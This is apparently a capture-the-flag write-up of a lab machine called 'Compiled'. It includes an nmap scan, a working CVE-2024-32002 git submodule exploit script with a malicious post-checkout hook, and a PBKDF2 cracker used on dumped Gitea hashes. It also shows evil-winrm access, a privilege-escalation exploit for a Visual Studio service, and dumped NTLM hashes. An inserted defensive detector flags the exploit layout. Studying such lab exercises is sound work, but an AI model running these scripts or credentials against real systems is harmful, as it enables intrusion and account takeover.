Basic Information

Port Scan

3000,5000,5985:

$ nmap -sC -sV -Pn 10.10.11.26
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-29 13:15 CST
Nmap scan report for 10.10.11.26
Host is up (0.088s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3000/tcp open http Golang net/http server
|_http-title: Git
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=959b4523c0dee0b4; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=hY8hfcLO5RSp_U-NO3sQKMym_yc6MTcyMjIyOTc1MzY0MzMzNzQwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 29 Jul 2024 05:09:13 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-arc-green">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Git</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=f59ae1817c3fad12; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=zjgWl4iukH3vELhAWnFOYmY_lYQ6MTcyMjIyOTc1NDE2MTk5MDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 29 Jul 2024 05:09:14 GMT
|_ Content-Length: 0
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title: Compiled - Code Compiling Services
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=7/29%Time=66A725F3%P=x86_64-apple-darwin23.4.
SF:0%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,3000,"HTTP/1\.0\x20200\x20OK\r\nCache-Co
SF:ntrol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_
SF:gitea=959b4523c0dee0b4;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-
SF:Cookie:\x20_csrf=hY8hfcLO5RSp_U-NO3sQKMym_yc6MTcyMjIyOTc1MzY0MzMzNzQwMA
SF:;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-
SF:Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2029\x20Jul\x202024\x2005:09:1
SF:3\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"
SF:theme-arc-green\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"w
SF:idth=device-width,\x20initial-scale=1\">\n\t<title>Git</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjo
SF:iR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb2
SF:1waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpb
SF:GVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwi
SF:c2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjM
SF:wMDA")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20
SF:Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age
SF:=0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i
SF:_like_gitea=f59ae1817c3fad12;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r
SF:\nSet-Cookie:\x20_csrf=zjgWl4iukH3vELhAWnFOYmY_lYQ6MTcyMjIyOTc1NDE2MTk5
SF:MDIwMA;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-
SF:Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2029\x20Jul\x202024\x200
SF:5:09:14\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP
SF:/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20chars
SF:et=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.68 seconds

3000

It is Gitea:

5000

Submit a URL for online compilation:

Compiled

Gitea hosts two projects: one is the web service running on port 5000, the other is a calculator example project. From them we learn that the git version is 2.45.0 and that recursive clones are used:

CVE-2024-32002

Based on accumulated knowledge and a bit of searching, the relevant vulnerability can be found:

Then submit the URL and get a shell as Richard:

http://gitea.compiled.htb:3000/miao/captain.git

gen.sh

From the BF forum:

#!/bin/bash

git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

rm -rf captain
rm -rf hook

git clone http://gitea.compiled.htb:3000/miao/hook.git
cd hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e Payload
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..

git clone http://gitea.compiled.htb:3000/miao/captain.git
cd captain
git submodule add --name x/y "http://gitea.compiled.htb:3000/miao/hook.git" A/modules/x
git commit -m "add-submodule"
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push
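A defensive counterpart, added here and not part of the forum script or the original writeup: given `git ls-tree -r` output (and the contents of symlink blobs from `git cat-file -p`), it flags the three features of the repository layout built above, so a Git host or CI pipeline can reject such a push before a recursive clone runs it. The object ids and tree listing are constructed placeholders.

```python
import re
from collections import namedtuple

Entry = namedtuple("Entry", "mode type sha path")
LS_TREE_RE = re.compile(r"^(\d{6}) (blob|tree|commit) ([0-9a-f]{40})\t(.+)$")
HOOK_NAMES = {"post-checkout", "post-merge", "pre-commit", "pre-push", "post-update"}


def parse_ls_tree(text):
    """Parse `git ls-tree -r <rev>` lines into Entry tuples (other lines are skipped)."""
    return [Entry(*m.groups()) for m in map(LS_TREE_RE.match, text.splitlines()) if m]


def find_suspicious(entries, symlink_targets):
    """Report the CVE-2024-32002 layout features: a symlink into .git, a submodule
    path that collides with that symlink on a case-insensitive filesystem, and
    tracked hook scripts. symlink_targets maps a symlink blob sha to its content."""
    findings = []
    symlinks = [e for e in entries if e.mode == "120000"]   # symlink entries
    gitlinks = [e for e in entries if e.mode == "160000"]   # submodule (gitlink) entries
    for s in symlinks:
        target = symlink_targets.get(s.sha, "")
        if ".git" in target.replace("\\", "/").split("/"):
            findings.append(f"symlink {s.path} -> {target!r} points into .git")
        for g in gitlinks:
            parts = g.path.split("/")
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                # 'A' vs 'a': distinct in the index, the same directory on NTFS/APFS
                if prefix != s.path and prefix.lower() == s.path.lower():
                    findings.append(f"submodule {g.path}: '{prefix}' collides case-insensitively with symlink {s.path}")
    for e in entries:
        parts = e.path.split("/")
        if len(parts) >= 2 and parts[-2] == "hooks" and parts[-1] in HOOK_NAMES:
            findings.append(f"tracked hook script {e.path}")
    return findings


# Constructed sample combining both repositories from the script above (in a real
# scan each repository, including submodules, is listed separately); ids are fake.
DOTGIT_SHA = "a" * 40
SAMPLE_LS_TREE = "\n".join([
    f"100644 blob {'b' * 40}\t.gitmodules",
    f"120000 blob {DOTGIT_SHA}\ta",
    f"160000 commit {'c' * 40}\tA/modules/x",
    f"100755 blob {'d' * 40}\ty/hooks/post-checkout",
])
SYMLINK_BLOBS = {DOTGIT_SHA: ".git"}

if __name__ == "__main__":
    for finding in find_suspicious(parse_ls_tree(SAMPLE_LS_TREE), SYMLINK_BLOBS):
        print(finding)
```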

gitea

Routine browsing of the filesystem turns up the Gitea database file; querying it yields the password hashes and salts:

PS C:\Program Files\Gitea\data\gitea.db

sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0

With the hash and salt obtained above, emily's password can be cracked:

$ python3 gitea_crack.py
Found password: 12345678

gitea_crack.py

import hashlib
import binascii


def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    # Gitea's "pbkdf2$50000$50" algorithm string: PBKDF2-HMAC-SHA256,
    # 50000 iterations, 50-byte derived key
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',                   # hashing algorithm
        password.encode('utf-8'),   # password
        salt,                       # salt
        iterations,                 # number of iterations
        dklen=dklen                 # key length
    )
    return hash_value


def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
    target_hash_bytes = binascii.unhexlify(target_hash)

    with open(dictionary_file, 'r', encoding='utf-8', errors='ignore') as file:
        for line in file:
            password = line.strip()
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)

            # Check if hash is correct
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password

    print("Password not found.")
    return None


# Parameters
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')  # Salt from gitea.db
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'  # hash from gitea.db

# Path to dictionary
dictionary_file = 'rockyou.txt'

find_matching_password(dictionary_file, target_hash, salt)

user flag

Log in via WinRM as Emily; user.txt is on the desktop:

evil-winrm -i 10.10.11.26 -u emily -p12345678

Privilege Escalation Information

Routine enumeration finds the VSStandardCollectorService150 service, and we have write permissions on MofCompiler.exe; searching for this turns up a recent vulnerability:

Privilege Escalation & root flag

Modify the code to match the actual environment and compile the exploit:

WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";

CopyFile(L"c:\\Windows\\Tasks\\miao.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);

Then run the exploit:

net start msiserver
Expl.exe
.\RunasCs.exe emily 12345678 Expl.exe

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f75c95bc9312632edec46b607938061e:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Emily:1001:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Richard:1002:aad3b435b51404eeaad3b435b51404ee:f21635b4c33e9ed3ee47dd5b31ff0f92:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ac8352a8680463c78247b75a023999cc:::

References